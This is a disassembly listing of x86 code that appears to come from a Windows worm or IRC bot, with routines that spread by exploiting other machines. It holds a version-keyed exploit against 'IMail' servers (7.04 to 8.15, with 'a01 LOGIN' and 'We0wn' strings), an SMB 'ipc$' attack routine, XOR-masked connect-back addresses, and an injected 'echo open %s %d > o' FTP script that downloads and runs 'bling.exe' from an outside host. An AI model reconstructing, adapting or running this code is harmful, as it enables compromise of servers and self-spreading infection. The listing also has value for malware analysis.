loc_40CE5F: ; CODE XREF: seg000:0040CE5A�j
push ebx
push 48h
push offset dword_43E108
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40CE5C
push ebx
mov esi, 1000h
push esi
lea eax, [ebp-1138h]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40CEA0
push dword ptr [ebp-8]
jmp short loc_40CEB8
; ---------------------------------------------------------------------------
loc_40CEA0: ; CODE XREF: seg000:0040CE99�j
push ebx
push esi
lea eax, [ebp-1138h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_40CEC9
loc_40CEB8: ; CODE XREF: seg000:0040CE5D�j
; seg000:0040CE9E�j
call sub_41E2A1
pop ecx
push edi
loc_40CEBF: ; CODE XREF: seg000:0040CE45�j
call ds:dword_444218 ; closesocket
loc_40CEC5: ; CODE XREF: seg000:0040CC78�j
; seg000:0040CCC7�j ...
xor eax, eax
jmp short loc_40CF19
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: seg000:0040CEB6�j
call sub_41E2A1
pop ecx
push edi
call ds:dword_444218 ; closesocket
loc_40CED6: ; CODE XREF: seg000:0040CDAA�j
push 1F4h
call ds:dword_42B014 ; Sleep
push 7C7h
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz short loc_40CF16
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
loc_40CF16: ; CODE XREF: seg000:0040CF03�j
xor eax, eax
inc eax
loc_40CF19: ; CODE XREF: seg000:0040CEC7�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
mov esi, 160h
push esi
mov dword ptr [ebp-4], 6741A1CDh
call sub_41E5D3
push esi
mov edi, eax
push 0
push edi
call sub_41E5F0
push 12h
push offset dword_43E788
push edi
call sub_41F400
lea esi, [edi+11h]
push offset dword_432E40
push esi
call sub_41EED0
push offset aThcownziis ; "THCOWNZIIS!"
push esi
call sub_41EED0
not dword ptr [ebp-4]
push 4
lea eax, [ebp-4]
push eax
push esi
call sub_41F2C0
xor eax, eax
mov ax, word ptr ds:dword_4D525C
add esp, 38h
push eax
call ds:dword_444260 ; htons
push dword ptr [ebp+8]
mov [ebp-8], eax
call sub_4023C9
pop ecx
push eax
call ds:dword_44417C ; inet_addr
xor dword ptr [ebp-8], 9393h
mov [ebp-0Ch], eax
xor dword ptr [ebp-0Ch], 93939393h
push 2
lea eax, [ebp-8]
push eax
push offset word_43E7A2
call sub_41F400
push 4
lea eax, [ebp-0Ch]
push eax
push offset dword_43E7A4
call sub_41F400
push offset byte_43E7A0
push esi
call sub_41EED0
add esp, 20h
push 6
push 1
push 2
call ds:dword_444100 ; socket
mov esi, eax
lea eax, [ebp+0Ch]
push eax
call ds:dword_44417C ; inet_addr
push 1BBh
mov [ebp-18h], eax
mov word ptr [ebp-1Ch], 2
call ds:dword_444260 ; htons
mov [ebp-1Ah], ax
push 10h
lea eax, [ebp-1Ch]
push eax
push esi
call ds:dword_4440AC ; connect
test eax, eax
jnz short loc_40D04F
push eax
push 15Fh
push edi
push esi
call ds:dword_4441A0 ; send
push esi
call ds:dword_444218 ; closesocket
push edi
call sub_41E2A1
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp short loc_40D051
; ---------------------------------------------------------------------------
loc_40D04F: ; CODE XREF: seg000:0040D01B�j
xor eax, eax
loc_40D051: ; CODE XREF: seg000:0040D04D�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D055 proc near ; CODE XREF: seg000:0040D728�p
var_800 = byte ptr -800h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 800h
push esi
push edi
mov edi, [ebp+arg_BC]
push 0
mov esi, 400h
push esi
lea eax, [ebp+var_800]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz loc_40D128
movzx eax, word ptr ds:dword_4D1FE4
push eax
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_400]
push esi
push eax
call sub_41E6FE
add esp, 14h
lea eax, [ebp+var_400]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40D128
push 1F4h
call ds:dword_42B014 ; Sleep
push offset aBling_exe ; "bling.exe\r\n"
lea eax, [ebp+var_400]
push esi
push eax
call sub_41E6FE
add esp, 0Ch
lea eax, [ebp+var_400]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40D128
push 0
push esi
push offset dword_4D4BB0
push edi
call ds:dword_444064 ; recv
push edi
call ds:dword_444218 ; closesocket
loc_40D128: ; CODE XREF: sub_40D055+2A�j
; sub_40D055+78�j ...
pop edi
pop esi
leave
retn
sub_40D055 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
push edi
mov dword ptr [ebp-14h], 10h
call sub_41ECDE
cdq
mov ecx, 3E8h
idiv ecx
lea eax, [ebp+0Ch]
push eax
mov edi, edx
add edi, 7D0h
mov [ebp-20h], edi
call ds:dword_444168 ; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_40D17F
lea eax, [ebp+0Ch]
push eax
call ds:dword_42B218 ; inet_addr
cmp eax, 0FFFFFFFFh
mov ds:dword_4D4CC0, eax
jz loc_40D757
loc_40D17F: ; CODE XREF: seg000:0040D165�j
push 6
push 1
push 2
pop ebx
push ebx
call ds:dword_444100 ; socket
test eax, eax
mov ds:dword_4D4CBC, eax
jz loc_40D757
test esi, esi
jz short loc_40D1B6
movsx eax, word ptr [esi+0Ah]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp-0Ch]
push eax
call sub_41F400
add esp, 0Ch
jmp short loc_40D1BE
; ---------------------------------------------------------------------------
loc_40D1B6: ; CODE XREF: seg000:0040D19C�j
mov eax, ds:dword_4D4CC0
mov [ebp-0Ch], eax
loc_40D1BE: ; CODE XREF: seg000:0040D1B4�j
test esi, esi
jz short loc_40D1CC
mov ax, [esi+8]
mov [ebp-10h], ax
jmp short loc_40D1D0
; ---------------------------------------------------------------------------
loc_40D1CC: ; CODE XREF: seg000:0040D1C0�j
mov [ebp-10h], bx
loc_40D1D0: ; CODE XREF: seg000:0040D1CA�j
push dword ptr [ebp+0A8h]
call ds:dword_444260 ; htons
push dword ptr [ebp+8]
mov [ebp-0Eh], ax
call sub_4023C9
pop ecx
push eax
call ds:dword_44417C ; inet_addr
push edi
mov esi, eax
call ds:dword_444260 ; htons
movzx eax, ax
xor eax, 7C1Fh
mov [ebp-1Ch], eax
push 4
lea eax, [ebp-18h]
push eax
xor esi, 7C1F1AE0h
push offset dword_43E9A8
mov [ebp-18h], esi
call sub_41F400
push ebx
lea eax, [ebp-1Ch]
push eax
push offset word_43E9AE
call sub_41F400
push 386h
push 90h
mov edi, offset dword_4D4CC8
push edi
call sub_41E5F0
push 0Ch
push offset aA01Login ; "a01 LOGIN \"&"
push edi
call sub_41F400
push 138h
push offset dword_43E8F0
push offset dword_4D4D74
call sub_41F400
push 2Ah
push offset dword_43EAC8
push offset dword_4D4F94
call sub_41F400
add esp, 48h
push 0Bh
push offset aWe0wn ; "\" \"We0wn\"\r\n"
push offset word_4D504E
call sub_41F400
add esp, 0Ch
push 10h
lea eax, [ebp-10h]
push eax
push ds:dword_4D4CBC
call ds:dword_4440AC ; connect
test eax, eax
mov ds:dword_4D4CB8, eax
jnz loc_40D757
push eax
push 100h
mov esi, offset dword_4D4BB0
push esi
push ds:dword_4D4CBC
call ds:dword_444064 ; recv
push offset aImail ; "IMail"
push esi
mov ds:dword_4D4CB0, eax
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz loc_40D7DE
push offset a7_04 ; "7.04"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D30D
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA30
loc_40D303: ; CODE XREF: seg000:0040D335�j
; seg000:0040D370�j ...
push offset dword_4D4F84
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D30D: ; CODE XREF: seg000:0040D2EA�j
push offset a7_05 ; "7.05"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D337
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA38
jmp short loc_40D303
; ---------------------------------------------------------------------------
loc_40D337: ; CODE XREF: seg000:0040D31C�j
push offset a7_06 ; "7.06"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D359
push offset a7_07 ; "7.07"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D372
loc_40D359: ; CODE XREF: seg000:0040D346�j
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA40
jmp short loc_40D303
; ---------------------------------------------------------------------------
loc_40D372: ; CODE XREF: seg000:0040D357�j
push offset a7_10 ; "7.10"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D394
push offset a7_11 ; "7.11"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D3B0
loc_40D394: ; CODE XREF: seg000:0040D381�j
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA48
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D3B0: ; CODE XREF: seg000:0040D392�j
push offset a7_12 ; "7.12"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D3DD
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA50
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D3DD: ; CODE XREF: seg000:0040D3BF�j
push offset a7_13 ; "7.13"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D3FF
push offset a7_14 ; "7.14"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D41B
loc_40D3FF: ; CODE XREF: seg000:0040D3EC�j
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA58
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D41B: ; CODE XREF: seg000:0040D3FD�j
push offset a7_15 ; "7.15"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D448
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA60
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D448: ; CODE XREF: seg000:0040D42A�j
push offset a8_00 ; "8.00"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D475
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA68
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D475: ; CODE XREF: seg000:0040D457�j
push offset a8_01 ; "8.01"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D4A2
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA70
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D4A2: ; CODE XREF: seg000:0040D484�j
push offset a8_02 ; "8.02"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D4CF
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA78
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D4CF: ; CODE XREF: seg000:0040D4B1�j
push offset a8_03 ; "8.03"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D4FC
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA80
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D4FC: ; CODE XREF: seg000:0040D4DE�j
push offset a8_04 ; "8.04"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D529
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA88
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D529: ; CODE XREF: seg000:0040D50B�j
push offset a8_05 ; "8.05"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D556
push ebx
push offset dword_43EA2C
push offset word_4D4F82
call sub_41F400
push 4
push offset dword_43EA90
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D556: ; CODE XREF: seg000:0040D538�j
push offset a8_10 ; "8.10"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D583
push ebx
push offset dword_43EA2C
push offset word_4D4F7A
call sub_41F400
push 4
push offset dword_43EA98
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D583: ; CODE XREF: seg000:0040D565�j
push offset a8_11 ; "8.11"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D5B0
push ebx
push offset dword_43EA2C
push offset word_4D4F7A
call sub_41F400
push 4
push offset dword_43EAA0
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D5B0: ; CODE XREF: seg000:0040D592�j
push offset a8_12 ; "8.12"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D5DA
push ebx
push offset dword_43EA2C
push offset word_4D4F7A
call sub_41F400
push 4
push offset dword_43EAA8
jmp short loc_40D630
; ---------------------------------------------------------------------------
loc_40D5DA: ; CODE XREF: seg000:0040D5BF�j
push offset a8_13 ; "8.13"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D604
push ebx
push offset dword_43EA2C
push offset word_4D4F7A
call sub_41F400
push 4
push offset dword_43EAB0
jmp short loc_40D630
; ---------------------------------------------------------------------------
loc_40D604: ; CODE XREF: seg000:0040D5E9�j
push offset a8_14 ; "8.14"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz loc_40D75E
push ebx
push offset dword_43EA2C
push offset word_4D4F7A
call sub_41F400
push 4
push offset dword_43EAB8
loc_40D630: ; CODE XREF: seg000:0040D57E�j
; seg000:0040D5AB�j ...
push offset dword_4D4F7C
loc_40D635: ; CODE XREF: seg000:0040D308�j
call sub_41F400
add esp, 18h
loc_40D63D: ; CODE XREF: seg000:0040D7ED�j
mov esi, ds:dword_42B014
push 64h
call esi ; Sleep
push 0
push edi
call sub_41E1C0
pop ecx
push eax
push edi
push ds:dword_4D4CBC
call ds:dword_4441A0 ; send
push 64h
call esi ; Sleep
push dword ptr [ebp-20h]
xor edi, edi
mov [ebp-0Ch], edi
call ds:dword_444260 ; htons
push 6
xor esi, esi
inc esi
push esi
push ebx
mov [ebp-0Eh], ax
call ds:dword_444100 ; socket
push 10h
lea ecx, [ebp-10h]
push ecx
push eax
mov ds:dword_4D4CB4, eax
call ds:dword_4441E4 ; bind
cmp eax, edi
mov ds:dword_4D4CB8, eax
jnz loc_40D757
push esi
push ds:dword_4D4CB4
call ds:dword_444230 ; listen
cmp eax, edi
mov ds:dword_4D4CB8, eax
jnz loc_40D757
mov eax, ds:dword_4D4CB4
mov [ebp-128h], eax
lea eax, [ebp-28h]
push eax
push edi
push edi
lea eax, [ebp-12Ch]
push eax
push esi
mov dword ptr [ebp-28h], 8
mov [ebp-24h], edi
mov [ebp-12Ch], esi
call ds:dword_42B21C ; select
test eax, eax
jle short loc_40D757
lea eax, [ebp-14h]
push eax
lea eax, [ebp-10h]
push eax
push ds:dword_4D4CB4
call ds:dword_4440BC ; accept
mov ecx, [ebp+0B0h]
shl ecx, 6
push eax
lea ecx, dword_43D888[ecx]
inc dword ptr [ecx]
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
mov ds:dword_4D50C8, eax
rep movsd
call sub_40D055
add esp, 0C0h
push ds:dword_4D4CBC
call ds:dword_444218 ; closesocket
push ds:dword_4D4CB4
call ds:dword_444218 ; closesocket
push ds:dword_4D50C8
loc_40D751: ; CODE XREF: seg000:0040D7F9�j
call ds:dword_444218 ; closesocket
loc_40D757: ; CODE XREF: seg000:0040D179�j
; seg000:0040D194�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: seg000:0040D613�j
push offset a8_15 ; "8.15"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40D78B
push ebx
push offset dword_43EA2C
push offset word_4D4F7A
call sub_41F400
push 4
push offset dword_43EAC0
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D78B: ; CODE XREF: seg000:0040D76D�j
push offset aHotfix2 ; "hotfix2"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a4_0 ; "4.0"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a5_0 ; "5.0"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a6_0 ; "6.0"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a7_0 ; "7.0"
push esi
call sub_41F090
pop ecx
pop ecx
jmp short loc_40D7F3
; ---------------------------------------------------------------------------
loc_40D7DE: ; CODE XREF: seg000:0040D2D5�j
push offset aImail ; "IMail"
push esi
call sub_41F090
test eax, eax
pop ecx
pop ecx
jnz loc_40D63D
loc_40D7F3: ; CODE XREF: seg000:0040D79A�j
; seg000:0040D7AB�j ...
push ds:dword_4D4CBC
jmp loc_40D751
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7FE proc near ; CODE XREF: seg000:0040DD59�p
; seg000:0040DD7B�p ...
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_41EA20
mov eax, ds:dword_432F94
push ebx
mov [ebp+var_10], eax
mov eax, ds:dword_432F98
push esi
mov [ebp+var_C], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_41E6A6
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_40D837: ; CODE XREF: sub_40D7FE+4F�j
mov cl, [ebp+eax+var_3C]
mov [ebp+eax*2+var_104], cl
mov [ebp+eax*2+var_103], bl
inc eax
cmp eax, 28h
jl short loc_40D837
push 60h
lea eax, [ebp+var_B4]
push offset dword_43EFF8
push eax
call sub_41F400
lea eax, [ebp+var_3C]
push eax
call sub_41E1C0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_41F400
add esp, 1Ch
push 9
lea eax, [ebp+var_3C]
push (offset aC_4+3)
push eax
call sub_41E1C0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_41F400
lea eax, [ebp+var_3C]
push eax
call sub_41E1C0
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
push 1
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_41F400
lea eax, [ebp+var_3C]
push eax
call sub_41E1C0
shl al, 1
add al, 9
mov [ebp+var_2], al
push 1
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_41F400
xor eax, eax
mov ax, word ptr ds:dword_43F400
add esp, 2Ch
push eax
call ds:dword_444260 ; htons
push 2
xor eax, 9999h
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_43ECF0
call sub_41F400
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_40D9FE
mov edi, 0DACh
push edi
lea eax, [ebp+var_1CC4]
push 90h
push eax
call sub_41E5F0
mov eax, [ebp+arg_C0]
imul eax, 3Ch
lea eax, dword_43F440[eax]
push 4
push eax
mov [ebp+var_14], eax
lea eax, [ebp+var_14E0]
push eax
call sub_41F400
mov esi, offset dword_43EC40
push esi
call sub_41E1C0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_41F400
push 4
lea eax, [ebp+var_11AC]
push offset dword_432F80
push eax
call sub_41F400
push 4
push [ebp+var_14]
lea eax, [ebp+var_11A8]
push eax
call sub_41F400
add esp, 40h
push esi
call sub_41E1C0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_41F400
add esp, 10h
xor eax, eax
loc_40D9B0: ; CODE XREF: sub_40D7FE+1CA�j
mov cl, [ebp+eax+var_1CC4]
mov [ebp+eax*2+var_4804], cl
mov [ebp+eax*2+var_4803], bl
inc eax
cmp eax, edi
jl short loc_40D9B0
mov esi, 1C52h
push esi
lea eax, [ebp+var_89B4]
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_41E5F0
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_41E5F0
add esp, 18h
jmp short loc_40DA55
; ---------------------------------------------------------------------------
loc_40D9FE: ; CODE XREF: sub_40D7FE+11B�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_41E5F0
mov esi, offset dword_43EC40
push esi
call sub_41E1C0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_41F400
lea eax, [ebp+var_10]
push eax
call sub_41E1C0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_41F400
mov eax, ds:dword_43F440
add esp, 2Ch
mov [ebp+var_768], eax
loc_40DA55: ; CODE XREF: sub_40D7FE+1FE�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_41E5F0
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
push ebx
add eax, 4
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40DA94
loc_40DA8D: ; CODE XREF: sub_40D7FE+2BD�j
; sub_40D7FE+2E4�j ...
xor al, al
jmp loc_40DC42
; ---------------------------------------------------------------------------
loc_40DA94: ; CODE XREF: sub_40D7FE+28D�j
push ebx
mov esi, 640h
push esi
lea eax, [ebp+var_744]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push 68h
push offset dword_43F060
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DA8D
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push 0A0h
push offset dword_43F0D0
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DA8D
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call ds:dword_444064 ; recv
cmp [ebp+arg_C0], ebx
jz loc_40DBAA
push 68h
lea eax, [ebp+var_89B4]
push offset dword_43F290
push eax
call sub_41F400
push 1B5Ah
lea eax, [ebp+var_4804]
push eax
lea eax, [ebp+var_894C]
push eax
call sub_41F400
push 70h
lea eax, [ebp+var_68DC]
push offset dword_43F300
push eax
call sub_41F400
push 0A5Eh
lea eax, [ebp+var_3770]
push eax
lea eax, [ebp+var_686C]
push eax
call sub_41F400
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_43F378
push eax
call sub_41F400
add esp, 3Ch
push ebx
push 10FCh
lea eax, [ebp+var_89B4]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40DA8D
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_40DC00
; ---------------------------------------------------------------------------
loc_40DBAA: ; CODE XREF: sub_40D7FE+2FC�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_43F178
push eax
call sub_41F400
push 7D0h
lea eax, [ebp+var_F14]
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_41F400
push 90h
lea eax, [ebp+var_245C]
push offset off_43F1F8
push eax
call sub_41F400
add esp, 24h
push ebx
mov [ebp+var_1FB1], bl
push 0CF8h
lea eax, [ebp+var_2CA8]
loc_40DC00: ; CODE XREF: sub_40D7FE+3AA�j
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40DA8D
push 12Ch
call ds:dword_42B014 ; Sleep
push ds:dword_43F400
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
test al, al
setnz al
loc_40DC42: ; CODE XREF: sub_40D7FE+291�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D7FE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 654h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-14h], 2
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call ds:dword_444260 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call ds:dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40DD40
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40DD40
push edi
push 89h
push offset dword_43EDD8
push ebx
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DD40
push edi
mov esi, 640h
push esi
lea eax, [ebp-654h]
push eax
push ebx
call ds:dword_444064 ; recv
push edi
push 0A8h
push offset dword_43EE68
push ebx
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DD40
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call ds:dword_444064 ; recv
push edi
push 0DEh
push offset dword_43EF18
push ebx
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DD40
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call ds:dword_444064 ; recv
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40DD68
dec eax
jz short loc_40DD47
loc_40DD40: ; CODE XREF: seg000:0040DC9B�j
; seg000:0040DCB1�j ...
xor eax, eax
jmp loc_40DDD4
; ---------------------------------------------------------------------------
loc_40DD47: ; CODE XREF: seg000:0040DD3E�j
push edi
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40D7FE
add esp, 0C4h
push 0
jmp short loc_40DD8C
; ---------------------------------------------------------------------------
loc_40DD68: ; CODE XREF: seg000:0040DD3B�j
push 2
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40D7FE
add esp, 0C4h
test al, al
jnz short loc_40DDAC
push 1
loc_40DD8C: ; CODE XREF: seg000:0040DD66�j
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40D7FE
add esp, 0C4h
test al, al
jz short loc_40DDB3
loc_40DDAC: ; CODE XREF: seg000:0040DD88�j
mov dword ptr [ebp-4], 1
loc_40DDB3: ; CODE XREF: seg000:0040DDAA�j
push ebx
call ds:dword_444218 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_40DDD1
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
loc_40DDD1: ; CODE XREF: seg000:0040DDBE�j
xor eax, eax
inc eax
